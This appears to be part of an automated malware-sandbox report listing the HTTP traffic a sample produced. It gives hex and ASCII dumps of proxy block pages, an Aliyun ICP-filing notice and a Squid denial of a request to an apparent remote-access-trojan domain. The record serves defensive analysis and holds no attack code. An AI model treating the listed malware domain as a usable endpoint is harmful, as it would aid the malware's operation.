<style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.20Mime-Version: 1.0Date: Mon, 11 Mar 2024 07:37:23 GMTContent-Type: text/html;charset=utf-8Content-Length: 3830X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 11 Mar 2024 07:37:24 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlServer: Zscaler/6.2Cache-Control: no-cacheAccess-Control-Allow-Origin: *Content-length: 13607Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 63 6c 6f 73 65 64 70 72 6f 78 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 61 6c 65 72 74 68 72 65 65 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Mon, 11 Mar 2024 07:37:24 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 4d
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 07:37:24 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 